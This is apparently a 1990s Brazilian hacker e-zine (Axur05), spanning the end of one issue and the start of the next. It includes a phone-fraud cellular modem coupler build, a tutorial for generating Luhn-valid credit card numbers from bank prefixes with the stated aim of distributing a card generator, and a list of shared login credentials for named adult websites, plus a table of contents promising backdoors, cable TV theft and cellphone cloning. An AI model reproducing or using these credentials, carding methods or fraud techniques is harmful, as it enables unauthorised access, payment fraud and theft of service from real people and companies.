p/ os q tem visto o jornal, puderam perceber q ~~~~~~~ ja existe um grande numero de fraudes de celulares no Brasil! Se vc faz esse tipo de fraude, so peco q tenha cuidado, pois os caras tao com aparelhos bem sofisticados, e c vc bobear, ## (cadeia). * O q vc precisa: 1 Telefone de mesa(aqueles pequenos, com botoes luminosos eh o ideal, tipo paraguai.) 1 Soquete duplo de telefone 4 Uns 30cm de fio(cobre eh o ideal, aqueles encapados...) 1 Tubo de fio de solda 1 Rolo de fita isolante Soldador, chave de fenda, e outras coisas comuns a todo phreaker... InStRuCaO: ~~~~~~~~~ 1. Desparafuse o seu telefone comum; note q vc tem q desparafusar o hmmm... bom, eu nao sei como vcs chamam essa merda, mas o q vcs tem q desparafu- sar nao eh a base do fone, e sim o "handset", a parte q vc segura p/ poder ouvir e falar. Bom, entao ranque o s speaker e o microfone do telefone, e so deixe os fios. Como na figura: ____ Legenda: Û -> Speaker / ++Û| × -> Microfone / + Û| Speaker \ + -> Fio + | + ---Û| | - -> O q sera? ;) | + - ___| | | + -| | | + -| ---> Arranca-los e deixar apenas os fios | + -| | | + -|___ | | + ----×| | | +++++×| | \ +--×| Microfone / \ ____| |+-| |+-| Cabo, vai p/ a base 2. Agora solde fios(faca uma extensao deles), vc precisa de 4 pedacos, 2 sao p/ os 2 fios do speaker, e 2 p/ o microfone. 3. Coloque os fios da extensao do speaker do seu fone, nos fios do microfone do celular, OBSERVANDO A POLARIDADE! E apos isso enrole a conexao em fita isolante(ou fita crepe, a isolante eh melhor). Isso serve p/ firmar ainda + a conexao dos fios, e p/ impedir ruidos, interferencias, e sujeiras na linha. 4. Agora coloque a extensao dos fios do microfone do fone comum nos fios do speaker do celular, OBSERVANDO A POLARIDADE. A seguir, enrole-os em fita isolante como acima. Ok, eu sei q explicacao esta meio confusa mas tenho certeza d q o desenho ira ajuda-lo a entende-lo. Aqui vai uma breve explicacao p/ facilitar ainda mais a vidas dos lamers q ainda nao entenderam... O q vc fez, foi conectar os fios(+ e -) do speakers do seu telefone, nos fios do microfone do celular, e, conectar os fios do speaker do seu celu- lar nos fios do microfone do seu telefone comum. ATENCAO LAMERS! P/ as bes- tas q nao sabem, existe em eletronica um negocio chamado polo, tem o polo positivo(+) e o negativo(-), portanto, PELO AMOR D DEUS!! NAO ME faca a ca- gada e trocar os fios!! O fio + de um, deve ser conectado ao fio + do outro, e vice versa, o mesmo vale p/ o negativo.. eu nao testei.. mas acho q c vc inverter, vai dar um pau mutcho loco, ou no celular, ou no fone, ou no modem. So mais uma coisa, c vc nao sabe qual eh o fio + e o - da microfone nem do speaker do seu fone e do seu celular, nem sabe encontra-los, vc nao deveria nem estar lendo essa revista, ela eh "muita areia pro seu caminhaozinho". CoMo UsAr O aPaReLhO: ~~~~ ~~~~ ~ ~~~~~~~~ Basicamente o q vc fez foi transformar o seu fone de mesa em um acoplador acustico. Para usa-lo, basta seguir as intrucoes abaixo. 1. Plugue o seu soquete duplo de telefone no soquete do telefone. Plugue o seu telefone de mesa em um soquete, e o outro pluque no seu modem. 2. Deixe o seu telefone fora do gancho ate a sua linha esteja totalmente mor- ta(apos um tempo, vc simplesmente nao ouvira mais nada no telefone, nenhum sinal, so silencio, demora alguns minutos...) 3. Disque o numero do fone q vc quer chamar no seu telefone celular, e tecle SEND como vc faria normalmente. 4. Digite ATD no seu terminal do modem + . Agora seu modem deve estar fora do gancho, e esperando por um sinal de discagem do seu telefone celu- lar. DiAgRaMa Do ApArElHo: ~~~~~~~~ ~~ ~~~~~~~~ __ : : : : ________:__:_ ______ : : / : /:: ::::: : / :---+ +--------------: :: ::::::: : Peca do ouvido / :-+ : : +------------: :: ::::: : : ____: : : : : \:: _________ : : / : : : : : : : : : : : : : : : :_________: : : : : : : : : : : : : +-- : : ---------+ : [1][2][3] : : : +---- : : -------+ : : [4][5][6] : : : : : : : : [7][8][9] : : : : : : : : [*][0][#] : : : : : : : : _ _ _ : : \____ : : : : : [_][_][_] : : : : : : : /:: : \ :-------+ : : +-: :: ::: : Microfone \ :---------+ +---: :: ::: : \______: \:: : : :_____________: : : Telefone Celular : Telefone de mesa CoMo FuNcIoNa: ~~~~ ~~~~~~~~ O sinal do modem remoto sera transmitido p/ o speaker de seu celular p/ o telefone comum. Assim, seu modem recebera qualquer dado q chegue ao te- lefone comum apos vc ter teclado o comando ATD(fora do gancho). Da mesma forma, qualquer sinal emitido de seu modem sera transmitido p/ o speaker do fone comum e assim chegara ao microfone de seu celular, e sera transmitido p/ o modem remoto! SIMPLES D+!!! hehehe... mutcho baba!! P.s.: Eu gostaria d me desculpar com vcs porq infelizmente eu tinha + 2 oti- mos artigos p/ a revista desse mes, infelizmente por falta de tempo, provas eu nao consegui termina-los.. bom, fica p/ a prox. vao aguardan- do q vcs vao *adorar*! AT+. Worm_root - 1997(c) Global Domination Inc. }-===============================[chain]===============================-{ 12-) Algoritmo para Geracao de numeros de CC's ~~~~~~~~~ ~~~~ ~~~~~~~ ~~ ~~~~~~~ ~~ ~~~~ Este artigo e' dirigido mais a programadores que algum dia sonharam em desenvolver um prog do tipo do Cmaster ou Credit Wizard. Muitos textos tentam explicar o algoritmo usado para a elaboracao de numeros de cc's mas nenhum e' realmente completo ou explica como extrapolar varios nu- meros apartir de um numero base. Chega de falar merda e vamos ao que interessa. Para compreender melhor esse esquema vamos usar um numero correto(cla- ro, ficticio) de um cc qualquer: 4128 7541 3218 0366. Usaremos esse numero durante toda a primeira parte do texto. Os quatro primeiros digitos de um cartao de credito indicam o banco a que pertence o cartao. No nosso numero exemplo os quatro primeiros nu- meros sao '4128'. Estes digitos indicam um cartao do banco CITIBANK. Obvio que um banco nao vai possuir so um grupo de quatro digitos e sim varios(tipo... o citibank tem o 4128, 4013, 4271, 4556...). Ok, o primeiro numero do cc indica o seu tipo. Os principais sao: 3 = American Express 4 = Visa 5 = MasterCard 6 = Discover No nosso caso o cartao e' um belo VISA (numero 4). Agora repare em todos os digitos que ocupam posicao impar no cartao: 4128 7541 3218 0366 / | | | | | | \ posicao: 1 3 5 7 9 11 13 15 Cada numero que ocupa posicao impar no numero do cartao deve ser multi- plicado por dois. Se o resultado dessa multiplicacao for menor que nove deixe como esta e passe para o numero seguinte. Se o o resultado for maior que nove, subtrai-se nove do resultado obtido. Nos numeros de po- sicao par nao e' necessario qualquer esquema. No nosso exemplo: 4 * 2 = 8 ; oito < nove 1 = 1 ; posicao par 2 * 2 = 4 ; quatro < nove 8 = 8 ; posicao par 7 * 2 = 14 ; 14 > 9, portanto, 14 - 9 = 5 5 = 5 ; posicao par 4 * 2 = 8 ; oito < nove 1 = 1 ; posicao par 3 * 2 = 6 ; seis < nove 2 = 2 ; posicao par 1 * 2 = 2 ; dois < nove 8 = 8 ; posicao par 0 * 2 = 0 ; zero < nove 3 = 3 ; posicao par 6 * 2 = 12 ; 12 > 9, portanto, 12 - 9 = 3 6 = 6 ; posicao par Ok! O resultado que obtemos apos fazer esse esquema foi: 8148 5581 6228 0336 Agora faca a soma de todos os numeros obtidos: 8+1+4+8 + 5+5+8+1 + 6+2+2+8 + 0+3+3+6 = 70 Paulada! Se o resultado da soma for multiplo de 10 e tambem for menor que 150, pode ficar tranquilo, o numero e' totalmente valido. Repare no nosso numero exemplo: 70 e' multiplo de 10 e e' menor que 150 (ohhh!) Conclui-se que o numero de cc que usamos como exemplo e' um numero VISA valido pertencente ao Citibank (codigo 4128). Beleza! Mas com este esquema e' possivel apenas verificar se um cartao e' realmente valido, o que nao e' uma grande ajuda. Porem, vamos agora gerar um numero tendo por base apenas o codigo do banco. Vamos gerar, por exemplo, um cartao VISA do citibank: 4271 ???? ???? ???? Escolhemos mais 11 numeros (tem que ser 11 e nao 12), aleatorios entre 0 e 9: 4271 0614 8230 113? O passo seguinte e' tornar este numero um numero de cc valido. Como? Usando aquele simples processo de verificacao: 4 * 2 = 8 ; oito < nove 2 = 2 ; posicao par 7 * 2 = 14 ; 14 > 9, portanto, 14 - 9 = 5 1 = 1 ; posicao par 0 * 2 = 0 ; zero < nove 6 = 6 ; posicao par 1 * 2 = 2 ; dois < nove 4 = 4 ; posicao par 8 * 2 = 16 ; 16 > 9, portanto, 16 - 9 = 7 2 = 2 ; posicao par 3 * 2 = 6 ; seis < nove 0 = 0 ; posicao par 1 * 2 = 2 ; dois < nove 1 = 1 ; posicao par 3 * 2 = 6 ; seis < nove ? = ? ; Verificar depois Novo numero: 8251 0624 7260 216? Fazendo a soma obtemos: 8+2+5+1 + 0+6+2+4 + 7+2+6+0 + 2+1+6+? = 52 Porra, 52 e' menor que 150 mas nao e' multiplo de 10, entao, o numero deste cartao nao e' valido, correto? Nahh, ainda podemos validar este numero. Como? Se ainda temos um digito para colocar no numero certamente colocaremos um numero que torne o cartao valido. No caso o numero e' 8. O numero do cartao valido ficaria: 4271 0614 8230 1138 OK! Temos um numero de cartao valido gerado com numeros aleatorios, mas corretamente validado. Agora vamos extrapolar, ou seja, obter outros nu- meros apartir de um numero base. O nosso numero e' 4271 0614 8230 1138. Primeiramente escolhemos os numeros que queremos manter: 4271 0614 8230 1138 |||| |||| ==> Concluimos que voce e' esperto o bastante para deixar pelo menos o codigo do banco. Numeros mantidos: 4271 0614 ???? ???? Bem, agora o processo e' escolher outros numeros aleatorios entre 0 e 9 para formar o numero, lembrando que o ultimo digito deve ser deixado em branco para validarmos o numero apos terminado o esquema. Tah, mas qual a utilidade de tudo isso? Bem para quem sabe um minimo de alguma linguagem de programacao e' possivel fazer um prog gerador de cc's, espalhar pela rede e ficar famoso. Sabendo o algoritmo, o resto e' lucro! :) VooDoo - Global Domination Inc. (c)1997 }-===============================[chain]===============================-{ 13-) Logo Contest - by csh ~~~~~~~~~~~~ Seguinte: voces viciados em 3DStudio, Fractal Painter, PhotoShop, Corel Draw ou afins, estamos abrindo um concurso para o logo da axur... Mande seus jpegs (so' serao aceitos jpegs 24bits, nao venha com gifs de 256 cores..). " - Ao vencedor, as batatas!" Bom, nao temos batatas, mas para o melhor logo, iremos presentia-lo com alguma coisa, nao se desespere.... :) Todas as pessoas que participarem do concuros, terao seus nicks, divulgados na ezine de abril, entao, essa eh a sua chance de apare- cer para todos, como voluntario para a causa "AxUr'05"! upload': ftp.axur05.org/ezine/axur05/logo/ }-===============================[chain]===============================-{ 14-) Cartas ~~~~~~ Alguns mails eu estou colocando aki... leiam, riam, mijem em cima... essa sao opinioes de nossos leitores, portanto, nao queremos qquer complica- cao pro nosso lado.. Existem alguns mails serios, portanto sempre tem os que nao tem fundo logico, julguem por si proprios ;) From: **Supressed for security reasons** To: Subject: pergunta ??????????? Date: Tue, 11 Feb 1997 04:13:52 -0300 A mensagem original foi um pouco alterada, ate porque continha diversos erros de ortografia, nada q uma boa filtragem nao resolva.. > Aproposta dessa revista e realmente tentadora, mas analizandoa bem >estou prestes a chegar a comclusao q isso oq vcs estao fazendo e um pega >lamer, tendo a revista apenas como faixada. A nossa proposta realmente nao e' essa... ate' porque se quisessemos fazer algo pra "faxada", fundariamos uma igreja "cybertechnohackerlogica", com intencoes de lavagem cerebral total, formariamos um exercito de libertacao a informacao, quebrariamos lojas, colocariamos fogo em sua casa, dominariamos o mundo... Realmente nao eh essa a nossa proposta.... Nos estamos passando real info... nada de eticas, papo-furado, bull-shits!!! Estamos eh largando infos a massa A nossa indignacao ja foi exposta em outras oportunidades em outros artigos da axur, portanto susto nesse momento o assunto. Do mais, csh, csh@axur05.org > PERGUNTO: que garantia tenho de q meu e-mail nao vai entrar em um lista de >discussao ou mesmo em uma pequena brincadeira de e-mail bomber????? Se foi essa a sua questao, como notasse, tampouco demos um reply, como manda- mos email bomb.... > >aguardo a sua resposta ------------------------------------------------- Date sent: Tue, 4 Mar 1997 14:38:49 -0600 To: acidmud@thepentagon.com From: Subject: BBS-ZyZop-LaMMeR Gostei muito das duas edicoes da revista, realmente e um bom material. Agora vamos ao q interesa, numa das edicoes da mesma, vcs botaram algo de um arquivo chamado HEXED.EXE, pois bem, eu peguei esse arquivo, ele e um editor HeXaDeCiMaL. Mas vcs falam na revista q para ganhar mais acesso em BBS(PCBOARD), tenho q fazer um Up-Load de qualuer arquivo e editar o mesmo, tirando 1bt dele, e depois fazer o Up-Load novamente em ZMODEM, do mesmo arquivo. Agora eu pergunto, eu to quebrando a cabeça para descobrir como tiro 1bt de tal ARQuivo(*.*), mas não cheguei a lugar nenhum, nao seria possivel disser como se faz isso?ou apenas incaminhar para ficar mais facil?. Obrigado pela oportunidade de escrever!!!Espero por resposta objetivas..... Um Abraco "Vamos se UNiR, Hacker, Do BRaSiL e Do MuNDo" RESPOSTA: Que bom que gostou! ;) ------------------------------------------------- From: To: Date sent: Tue, 4 Mar 1997 10:23:17 -0300 Super genial o seu E-ZINE. Era o que estava faltando no Br. Apenas uma pequena coisa me desagradou por estes dias (em relacao a vc's): Kd a pagina oficial ? Kd o no. 2? Kd ??? Se possivel me enviem o novo local onde eu poderia acha-los (tambem o local do famoso no. ZERO) Certo de seu retorno, agradeco desde ja. Um forte [] para toda a galera, ?????????? RESPOSTA: A nossa pagina acho que ja ta explicado! Mantenha contato... ------------------------------------------------- Date sent: Sat, 1 Mar 1997 00:29:05 -0300 To: acidmud@thepentagon.com From: Subject: Sobre Axur05 Adorei o trabalho que voces da Axur05 estao fazendo mostrando de uma forma bastante clara os conceitos Hackers, voces escrevem de uma forma direta e muito profissional, parabens por esse trabalho bem feito. Nao estou conseguindo conectar-me ao site da Axur05, o endereco do site mudou??? Sera que seria possivel voce me mandar o proximo exemplar da Axur05 via e-mail, ou entao mandar o endereco do site onde eu encontro. desde ja agradeco. RESPOSTA: Nao mandamos a revista pelo email, mas algumas pessoas estao fazendo este grande favor para no's, por enquanto zine soh na com a galera... ;) ------------------------------------------------- Date sent: Thu, 27 Feb 1997 21:09:55 -0300 To: acidmud@thepentagon.com From: E ai tudo bem? Parabens pelo excelente "jornazinho" feito por voces. Precisamos provar que o Brasil não só possue uma massa esmagadora de "burrinhos", lamers, etc... Mas muitos que conhecem este maravilhoso instrumento de trabalho, que é o computador! Que rasgação de seda!!! Em outras palavras, precisamos espalhar os nossos conhecimentos a toda populacao internauta! Chutar os traseiros dos sysoper, donos de provedorias... Estes palhacos que sentam a faca nos pobres lamers, "burrinhos", que nao entendem nada! Fuck provedores!!! Se possivel, envie o proximo jornalzinho do dia 1 de marco, para este mail, eu dou um jeito de pega-lo. Esses otarios dessa tal de "Provale" tem senhas e logins tao faceis!!! Bando de burrinhos!!! Um abraco Acidmud, continue com este maravilhoso informativo, vamos detonar com estes provedores malditos!!! Ass: @hotpig RESPOSTA: Achei este teu "jornalzinho" um pouco arrogante, acho q estamos fazendo a nossa parte... ------------------------------------------------- Date sent: Thu, 27 Feb 1997 02:25:26 -0300 To: acidmud@thepentagon.com From: Subject: endereco E ai cara! Primeiramente quero parabenizar vcs pelo ezine power, realmente detonante, tenho os 2 primeiros impresso, mas so quero saber uma coisa! Kd a revista? Tenho procurado, ja perguntei pro Vodoo e ele nao me retornou, pra onde foi removida a Global??? Pode me dizer, cara levei um monte de camaradas naquela page e agora estamos perdidos, nao sabemos onde procurar, e um amigo meu tem uma BBS, to vendo com ele pra por seu zine la, realmente merece destaque! Muitissimo obrigado cara!! Aguardo resposta! Magoo P.A.R. Hacking The Planet RESPOSTA: Para nos ajudar distribua o zine isso faz com que escrevamos cada vez mais e mais! Obrigado dude... ------------------------------------------------- }-===============================[chain]===============================-{ 15-) Lista de passwords para sites porno - by VooDoo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well, aqui vai uma pequena lista de passwords para sites pornos. A maioria e' proveniente de sites WareZ, outros foram retirados de servers irc (tipo irc.mtv.com #xxxpass) e alguns nos mesmos conseguimos. ATENCAO: nem todo o sys admin e' burro, portanto, algumas contas podem nao existir mais (visto que o pessoal comeca a acessar direto fazendo com que os administradores percebam). Nao envie mensagens pro nosso endereco falando: "bahh, tal site nao ta funcionando, vai la' e verifica". Aviso para aqueles que nao tem uma namorada gostosa pra foder: manerem na punheta! "He4vY" pHuN! =) PS: A maioria das contas foram verificadas em 22/02/97. Letras maiusculas e minusculas em logins ou passwords devem ser consideradas. ============== Esquema ================== s= Site (Endereco da pagina) a= About (pequena descricao sobre o site) l= Login ou Username p= Password ========================================= s: http://www.pornopass.com a: Sistema que libera a entrada em mais de 500 outros sites pornos! Um dos mais inseguros que existem. Use qualquer uma das indentificacoes abaixo: cool funny sjus yoals piras hads god volleyball cindy fred tits adidas ace abc richard fuckme dick lisa superman beavis maggie letmein killer horny nin nirvana south north s: http://www.clublink.com a: Outro sistema com dezenas de sites pornos cadastrados. p: christopher s: http://www.adultsights.com a: Mais um sistema com sites cadastrados. Dificil de obter acesso. l: adult22249 p: 9900512 l: as34683 p: ps106964 l: as53920 p: ps169396 l: theman p: theman l: vicodind p: fuck s: http://www.validate.com a: Porra, to cansado! Mais um sistema phudido com sites cadastrados. l: adam p: adam l: terry p: terry l: wet p: pussy l: woody p: woody s: http://www.pinups.com l: user2 p: testament l: rancid p: captain s: http://www.pornomania.com l: Cyberguy p: wowkewl s: http://www.sexcentral.com l: malibu p: 90234 l: whata p: zammy s: http://www.shemale.com l: she p: male l: userid p: password s: http://www.smokinpussy.com l: zippo p: hockey s: http://www.tyffany.com l: berhack p: 123456 l: power45 p: power s: http://www.vividvideo.com l: Varitech p: ngi2634 l: Alladin1 p: erh2822 s: http://www.wcff.com l: hongkong p: cavalier s: http://www.xxxpics.com l: 123456 p: 123456 s: http://207.176.29.134 l: jd251 p: adult s: http://www.makinc.com/bigtop l: test p: test s: http://www.sexjapan.com l: denize p: 7hdbend4 s: http://www.clubporn.com l: gythu p: killwilma s: http://www.intertain-inc.com l: yakky p: tigers s: http://www.hotladies.com l: whorez p: whorezxx s: http://www.adamxxx.com/adamxxx/members/members.htm l: 701063 p: f8b7e === Final. Se mes que vem a gente nao estiver preso, tem mais passwds. XXX Password List ( parte 1/10 ) Copyright (c) Global Domination Inc. -------------------------------------- Agradecimento: A todos que leem e distribuem a nossa zine, mesmo saben- do que estamos em um mal momento nao abandonaram a causa axur05. Obrigado a HoTFire que foi muito dedicado junto a no's. LEMBRANDO: Todas as BBS estao liberadas pra distribuir o zine, estamos fazendo nossa parte escrevendo, agora vcs nos ajudam distribuindo. }-===============================[chain]===============================-{ - SE QUISER QUE A REVISTA CONTINUE ESCREVA-NOS, ATENDEREMOS A TODOS - - AGUARDEM - EM BREVE - O PROXiMO NUMERO DA SUA REViSTA HACKER - AXUR 05 - - = = = DiA 01 De ABRIL = = = - EM TODAS AS BBSz UNDERGROUND ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ²Û²± °±²Û²± °±²Û²± °±²Û²± °±²Û²± °±²Û²± °±²Û²± °±²Û²± °±²Û²± °±²Û²± °±²Û²± °±² ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Axur05 - Global Domination Inc. ³ ³ CopyRight 1997(c) ³ ³ -> www.axur05.org <- ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ²Û²± °±²Û²± °±²Û²± °±²Û²± °±²Û²± °±²Û²± °±²Û²± °±²Û²± °±²Û²± °±²Û²± °±²Û²± °±² ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Visualize utilizando editor com suporte pra ascii ex. vi, edit ou pico ÛÛÛÛÛ» ÛÛ» ÛÛ» ÛÛ» ÛÛ» ÛÛÛÛÛÛ» ÛÛÛÛÛÛ» ÛÛÛÛÛÛÛ» ÛÛÉÍÍÛÛ» ÈÛÛ»ÛÛɼ ÛÛº ÛÛº ÛÛÉÍÍÛÛ» ÛÛÉÍÛÛÛÛ» ÛÛÉÍÍÍͼ ÛÛÛÛÛÛÛº ÈÛÛÛɼ ÛÛº ÛÛº ÛÛÛÛÛÛɼ ÛÛºÛÛÉÛÛº ÛÛÛÛÛÛÛ» ÛÛÉÍÍÛÛº ÛÛÉÛÛ» ÛÛº ÛÛº ÛÛÉÍÍÛÛ» ÛÛÛÛɼÛÛº ÈÍÍÍÍÛÛº ÛÛº ÛÛº ÛÛɼ ÛÛ» ÈÛÛÛÛÛÛɼ ÛÛº ÛÛº ÈÛÛÛÛÛÛɼ ÛÛÛÛÛÛÛº Èͼ Èͼ Èͼ Èͼ ÈÍÍÍÍͼ Èͼ Èͼ ÈÍÍÍÍͼ ÈÍÍÍÍÍͼ - = Hackerland 29 de Fevereiro de 1998 = - < Revista n§ - 3.00 > . .. .. .. .. .. .. . ............................... " Pleni sunt caeli et terra gloria tua. Dominus vobiscum." - Anonymous " What do you wanna hack today?. " - Bill Gaytes " Enquanto vcs comem suas pizzas estupidas nos invadimos seus provedores, usamos suas contas e lemos seus mails... " - by se7en no Pizza Hut, Mexico 3 de Janeiro ............................... techno & hardcore forever . .. .. .. .. .. .. . ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ <<<<<<<<<<<<<<<<<<<<<<<< - - = < iNDiCE > = - - >>>>>>>>>>>>>>>>>>>>>>>> ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1. OFFERTORIUM... - mors stupebit et natura 2. MVS, a potencia do sistema IBM 3. DNS Spoofing 4. Backdoors ( teoria e pratica ) 5. Lista final de comandos para unix - Parte II 6. T h e S t a c k 7. Project: Multiples IPs 8. Tricks! 9. Scan de terceira classe 10. Falha nos sistemas de alarme com configuracao telefonica 11. Info & Misc and Shiiiiiiit 12. POP Hacking - O que eu preciso saber sobre isso? 13. Obtendo um numero ESN/MIN ( anarcophreaking ) 14. Rouch Motel - the bad guys's jail 15. Roubando TV `a Cabo! * GUIA DEFINITIVO BRASILEIRO * 16. Pequenos esquemas... 17. Acabando de vez com a telefonia celular Brasileira - PARTE I 18. Acabando de vez com a telefonia celular Brasileira - PARTE II 19. Project: Remote backdoor development kit 20. Axur05 FAQ 21. Rooxing mails !! 22. Novo Webmaster cast.: csh . .. . .. .. . .. . .. csh@axur05.org VooDoo . .. . .. .. . .. . .. voodoo@axur05.org - webmaster AciDmuD . .. . .. .. . .. . .. acidmud@axur05.org ( BUSTED ) page.: http:\\www.axur05.org - pagina oficial ftp.: - FTP ocasional Soup! >ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ< ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 1:> OFFERTORIUM - mors stupebit et natura ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by axur05'editors ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù Pois e' pessoal! Estamos aqui novamente com mais um numero da sua revista axur05. Tivemos problemas sim, inumeros... e quando pensavamos que eles haviam terminado apareciam mais problemas ainda, como se o universo cons- pirasse contra a nossa revista. Pois seja assim entao, contra ou a favor da vontade divina estamos devolta. Os tempos sao outros, conforme a axur05 foi se difundindo foi aparecendo mais carinha querendo o nosso fim fazendo entao com que demorassemos mui- to tempo para lancar esse numero 3 tao esperado. Mas esta ai galera, nao iremos continuar com o metodo antigo onde o zine era lancado mensalmente, tenham piedade das nossas almas... nos trabalhamos e estudamos tb. Agora com o nosso site no ar pretendemos nos aproximar mais ainda do leitor, pois por meio da pagina vc podera se atualizar ou mesmo buscar informacoes sobre no's da edicao da revista, nesse meio tempo recebemos centenas e centenas de mails pedindo se haviamos sido presos, mortos, massacrados, estuprados, disecados e onde estavam nossos corpos, creio que com o numero 3 possamos desmentir muitos boatos. Vamos lah entao: 1- Nao, a revista nao acabou e nem pretendemos acabar quando fizermos anunciaremos na pagina www.axur05.org, mas por enquanto negativo, os administradores de sistemas vao ter que nos aguentar por mais um bom tempo. 2- A axur05 nao e' um grupo de hacking! Pelo contrario... todos no's que escrevemos somos amigos e tudo, mas nao formamos grupos pelo simples fato de sermos contra qualquer ordem hierarquica. O que fazemos e escrever uma revista juntos de modo com que possamos levar um pouco do nosso conheci- mento ao publico geral. 3- No's nao somos hackers e nao fazemos servicos de hacking. Somos apenas cidadoes comuns que se interessam por uma parte da informatica muito pouco difundida. Portanto nao nos mande mails com subject "Preciso da ajuda de vcs para invadir meu provedor" pois os mesmos nao serao respondidos. 4- Nossa zine nao esta a venda e se alguem lhe vender por favor nos mande pelo menos 50% do que vc pagou :) pode denunciar pro procom tb. 5- Tambem nao fomos presos ou exilados! Ate agora nada disso foi neces- sario devido ao nosso amavel e adoravel sistema judiciario brasileiro... hehehe! Entao nao se preocupe com nossa saude ate ocorrer uma reforma mui- to grande na nossa constituicao no que diz respeito a crimes em computa- dores ou ate encontrarmos um administrador serial killer pelo caminho. 6- A vida e' bela! Continue lendo... Surgiram muitos zines depois do nosso, nao quero e' claro tirar os creditos do "primeiro" e-zine brasileiro sobre "hacking???"... Barata Eletrica, mas sei lah, acho que fomos os primeiros a escrever materias realmente praticas sem historias ou coisas do genero. E por essa maneira de escrita objetiva como ja falei, tivemos um retorno quase que automa- tico. Isso nos incentivou muito a continuar a escrever. Bom, a unica ajuda que solicitamos a todo e'... distribuam nosso zine. Pois soh assim poderemos continuar, ou vcs acham que vale a pena escrever tudo o que escrevemos apenas para meia duzia de pessoas? Se vc tem bbs, coloque o zine lah... e pode ter certeza que continuaremos por muito tempo a escre- ver. Nao pretendemos escrever o zine em outras linguas pq defendemos o patrio- tismo do nosso pais, nao posso negar que neste aspecto nos espelhamos ao pessoal da THC que soh escreve em alemao. Soh acho que em ingles tem muito material. E ta na hora de alguem olhar para a camada do hacking emergente do nosso pais. =) Levante a bandeira e una-se a no's nesse movimento cybernetico, somos a prova de que nem todos sao passivos e submissos a regras. Quanto a entrevista, contato ou coisa do tipo, obrigado, apesar de ja termos recebidos varias propostas nosso objetivo nao e' a autopromocao, ou usariamos os nomes reais e nao estes pseudonimos. Agora com o novo webmaster acho que a nossa pagina tera sua versao: ingles, alemao, slovaka e e' claro nosso belo portugues! Sobre o pessoal que escreveu esta revista veja acima no cast ;) Agora vamos para o que interessa,... Hugs() Offertorium by axur05'editors... ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 2:> MVS, a potencia do sistema IBM ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by Axcel ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù O MVS, para quem nao sabe e um Sistema Operacional, da IBM voltado para computadores de medio e grande porte(Mainframes). Aqui no Brasil, o MVS e pouco difundido, sendo restrito apenas as empresas de grande porte. Um dos exemplos de utilizacao do MVS, e a propria Telesp, isso tambem inclui outras Cias. Telefonicas, tais como a TeleRJ, TELEBRAS.. e as ou- tras TELE* que confiam todo seu sistema de informacoes a ele. Quando voce disca 102, a operadora busca informacoes em um prog. de ban- co de dados, que roda no MVS (seria pedir muito q as negas soubessem o- perar o MVS). As unicas coisas que elas fazem, e entrarem com seus RE's e senhas, e buscar as informacoes atraves de menus e controles, mas isso e assunto p/ um proximo texto ;) Bem, vamos ao MVS: O MVS Multiple Virtual Storage - Armazenamento Virtual Multiplo), e um dos Sistemas Operacionais mais populares da IBM. Ele excuta em uma vari- edade de modelos, incluindo os computadores de grande porte IBM system 370, 3090, 9370, 3090. O MVS, descende dos Sistemas Operacionais desenvolvidos na decada de 60 para o System/360. O mais interessante, e q a medida que o MVS evoluiu, ele teve, e manteve a compatibilidade com seus predecessores(ao contra- rio de uns ruindows 95 da vida...). Ao contrario de sistemas que alocam espaco em disco atraves d setores, o MVS aloca por trilhas e cilindros, dessa forma, a menor unidade de alo- cacao e bastante grande! Outra curiosidade, e q ele nao possui diretorios hierarquicos. No entan- to, ele possui uma serie de dados particionados que se assemelham uma hierarquia de dois niveis, e o formato para 